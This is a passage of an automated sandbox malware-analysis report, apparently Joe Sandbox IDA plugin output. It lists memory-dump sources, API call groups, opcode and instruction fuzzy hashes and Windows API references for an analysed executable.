                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                                                    • Instruction ID: dfaf182556d51e55246606ad8068755d669f5e8b2b4bbbea3128221acf3ce441
                                                                    • Opcode Fuzzy Hash: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                                                    • Instruction Fuzzy Hash: 4B11B421E1D641A1FB60AB25E485279B360FB48BB4FA44331DA3E52AD4CFBCD492E310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ItemRectTextWindow$Clientswprintf
                                                                    • String ID:
                                                                    • API String ID: 3322643685-0
                                                                    • Opcode ID: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                                                    • Instruction ID: 5702a59921c800379d4c7962256e110e62992302e4d804a304a6878b68a78832
                                                                    • Opcode Fuzzy Hash: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                                                    • Instruction Fuzzy Hash: 8E018421E0D38A65FF997752A499279D391AF89744FE85034CC0E066DDDEECE884E320
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF731C8EB29,?,?,?,?,00007FF731C85712,?,?,?,00007FF731C8569E), ref: 00007FF731C8EAD8
                                                                    • GetProcessAffinityMask.KERNEL32 ref: 00007FF731C8EAEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Process$AffinityCurrentMask
                                                                    • String ID:
                                                                    • API String ID: 1231390398-0
                                                                    • Opcode ID: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                                    • Instruction ID: 9c1c82b2fb8eae551d33ee27cbcb6f7f5ffa551d26707b094d27e16744331e83
                                                                    • Opcode Fuzzy Hash: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                                    • Instruction Fuzzy Hash: 94E02B61F1458692DF08DF55D8414E9F391FFC8B40BD48036D50B83A14DE2CE1598B10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 1173176844-0
                                                                    • Opcode ID: 28e295908e45cc945cfa96d93c8ce30b5be855f4bd91cbefe518a9fba242814a
                                                                    • Instruction ID: 0f8cc569cd9bb002bc7fb2b77eff446482e6470de13f5280a1970b717b39a4d0
                                                                    • Opcode Fuzzy Hash: 28e295908e45cc945cfa96d93c8ce30b5be855f4bd91cbefe518a9fba242814a
                                                                    • Instruction Fuzzy Hash: 02E0B654E1911B65FB2A32A218651B982504F5C7B0EF82F30DB3D086C6ED9CB8A2A130
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 485612231-0
                                                                    • Opcode ID: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                                                    • Instruction ID: ad06e4302be49dace17a49ee1ee6ccabf600493a2567bc3f6f04c578ccd66ebc
                                                                    • Opcode Fuzzy Hash: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                                                    • Instruction Fuzzy Hash: ABE08650E0D503A2FF05BBF26C240B4D3905F54B40FA84834D90D87251EEBC94816620
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: 76092fec9ee0072f7de08517d0fc1e03b20ff4b8fddd779b1898f3f2b82d375e
                                                                    • Instruction ID: 42522e50e44f71117948c61620f77046378e3d503358724dc3666506afb6ebbc
                                                                    • Opcode Fuzzy Hash: 76092fec9ee0072f7de08517d0fc1e03b20ff4b8fddd779b1898f3f2b82d375e
                                                                    • Instruction Fuzzy Hash: 18D1DB72F0868269EB68EB2596442BCE7A1FB05BC4FA45035CB5D477A5CFBCE460D320
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 1017591355-0
                                                                    • Opcode ID: a9299d2a3130dccdd2b512c98cf76da81dd81bba2a2d1ba96f3ce2257837a3a3
                                                                    • Instruction ID: f9d9db21d2afed036cfa1b42e14957ef0ac7fc6c2666b8345ef64fd36d327079
                                                                    • Opcode Fuzzy Hash: a9299d2a3130dccdd2b512c98cf76da81dd81bba2a2d1ba96f3ce2257837a3a3
                                                                    • Instruction Fuzzy Hash: 2861F051F0C64761FB60BA29848527AE391AF81BD1FF44131EE4D06ED7EEECE441A231
                                                                    APIs
                                                                      • Part of subcall function 00007FF731C8E8C4: ReleaseSemaphore.KERNEL32 ref: 00007FF731C8E8F0
                                                                      • Part of subcall function 00007FF731C8E8C4: CloseHandle.KERNELBASE ref: 00007FF731C8E90F
                                                                      • Part of subcall function 00007FF731C8E8C4: DeleteCriticalSection.KERNEL32 ref: 00007FF731C8E926
                                                                      • Part of subcall function 00007FF731C8E8C4: CloseHandle.KERNEL32 ref: 00007FF731C8E933
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C91A4B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 904680172-0
                                                                    • Opcode ID: 17640105069ed2f0608eed1f021e5c9760774f5960a794fd50d6d3870de83f0d
                                                                    • Instruction ID: 9fd09fe513ed8b863bf3a0a66926f587fcfa796987ae52998beea395902aa5cf
                                                                    • Opcode Fuzzy Hash: 17640105069ed2f0608eed1f021e5c9760774f5960a794fd50d6d3870de83f0d
                                                                    • Instruction Fuzzy Hash: 4E619062F15681B2EF08EB65D5950BCB365FB41F90BA44532D72D07AC2DFACE8719310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: c57d8a0ec555fcee93534326d5ed40e5c5fc4c24212281de1439aedd617024c1
                                                                    • Instruction ID: 27d2d39dc9f0061102400b8d3703911d7f11f30497580e16ff17f60ed5a49272
                                                                    • Opcode Fuzzy Hash: c57d8a0ec555fcee93534326d5ed40e5c5fc4c24212281de1439aedd617024c1
                                                                    • Instruction Fuzzy Hash: 0251D463E0864264EB10AB25E8443B9A751FB86BC4FA40536EE4D07792CEFDE491D320
                                                                    APIs
                                                                      • Part of subcall function 00007FF731C83E88: FindClose.KERNELBASE(?,?,00000000,00007FF731C90791), ref: 00007FF731C83EBD
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7E9A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 1011579015-0
                                                                    • Opcode ID: 7e6327150e3ce0c451cb400d7a8f449b7137c37f6cfba28a80f2350899245dea
                                                                    • Instruction ID: 8b9666e6d21646d7f0d1ef86327feeec0afc5858df989ae24c8d637016bee3cc
                                                                    • Opcode Fuzzy Hash: 7e6327150e3ce0c451cb400d7a8f449b7137c37f6cfba28a80f2350899245dea
                                                                    • Instruction Fuzzy Hash: 2D518023E08682A5FB60EF29D4853BDA361FF84BD4FA40135DA8C476A5CFACE451D720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: 09a90ddaa16f23f76c014c9d84ad6b71e5b545690d4943b9b055974de98fba14
                                                                    • Instruction ID: dec4d5632120f98208ca45bf8ad2b394f97820af97f3aebd990d23237a078dab
                                                                    • Opcode Fuzzy Hash: 09a90ddaa16f23f76c014c9d84ad6b71e5b545690d4943b9b055974de98fba14
                                                                    • Instruction Fuzzy Hash: C541F562F18A9162EB14AA13A985379E391FB44FC0FA48435EF4D07F8ADFBCD4518300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: caeadaeb6b21dbd6819f5fdccb928094d199ec49b01aae4469461aad9123a8f3
                                                                    • Instruction ID: d7cf2325cdbaa1b17d5ef4e4b9c6480042b7ebeea6275ae2a7939c6f4fb87b6a
                                                                    • Opcode Fuzzy Hash: caeadaeb6b21dbd6819f5fdccb928094d199ec49b01aae4469461aad9123a8f3
                                                                    • Instruction Fuzzy Hash: B4411622E0871291EF14AB28D18537DA3A1EB48FD8FA42134EA4D07B99DFBCE441D760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                    • String ID:
                                                                    • API String ID: 3947729631-0
                                                                    • Opcode ID: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                                                    • Instruction ID: a004bed7cc6c30c5d922c411f29a8452232faa8ebd5c052872614f6395bb9db3
                                                                    • Opcode Fuzzy Hash: 2a2f1167b8a5567a1982a90cfda6841d20d3bae0c3aade27efee51deb8b54578
                                                                    • Instruction Fuzzy Hash: 7A41B321E28603A2FB15FB159850378A761BF50B40FF44836DA0D576E5CEBDEC41E7A1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 680105476-0
                                                                    • Opcode ID: ba0e9ec32f9d425c922e86707f850c9359ff9466c7c00b2dd6f3e6a55f5680d3
                                                                    • Instruction ID: d9538671f1b4fda8584a8f5815d40041f2966f9b8dba3412c2cb6357a1c09b5d
                                                                    • Opcode Fuzzy Hash: ba0e9ec32f9d425c922e86707f850c9359ff9466c7c00b2dd6f3e6a55f5680d3
                                                                    • Instruction Fuzzy Hash: 42218E22E08651A9EB14AA92A400279A350EB44FF0FB80B31DE7D47BD1DEFCE451A354
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: 35ac2f166feaefe62d92b72ca549baefce0208cc5dcb1b0d16f229ca39a288f7
                                                                    • Instruction ID: 5b6017dc100c64b7fafe37da1cc26e6d518833a15e96985b081c45c2cf2edf4a
                                                                    • Opcode Fuzzy Hash: 35ac2f166feaefe62d92b72ca549baefce0208cc5dcb1b0d16f229ca39a288f7
                                                                    • Instruction Fuzzy Hash: 4A214922F1458276EB09FB60D5483F9A324FB59784FE44431E71D07AA2DFBCA4A5E321
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                                    • Instruction ID: 69b6bb6973fde0074e86e8edabdf8632fbe5f6e7eed5b30fab25c6d7f25d4f56
                                                                    • Opcode Fuzzy Hash: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
                                                                    • Instruction Fuzzy Hash: 73117C62D0D682A6E710EF51B440139F3A4FB40780FE44534EA8EC7696DFBCE800A721
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: 3adf43a935cc40b1011b909937d1f58e6063e9716f7a31a2f6da0ebc7781c1ad
                                                                    • Instruction ID: 1ff28c3389b54b331cfac0371136c08a617867ca8341f32ede6bcf0f7d21df1b
                                                                    • Opcode Fuzzy Hash: 3adf43a935cc40b1011b909937d1f58e6063e9716f7a31a2f6da0ebc7781c1ad
                                                                    • Instruction Fuzzy Hash: 35010462E1878195FB11AB28E445279B361FB88BA0FE06231E69C07AA5DFACD041D714
                                                                    APIs
                                                                      • Part of subcall function 00007FF731CA1584: GetModuleHandleW.KERNEL32(?,?,?,00007FF731CA14F3,?,?,?,00007FF731CA18AA), ref: 00007FF731CA15AB
                                                                    • DloadProtectSection.DELAYIMP ref: 00007FF731CA1549
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
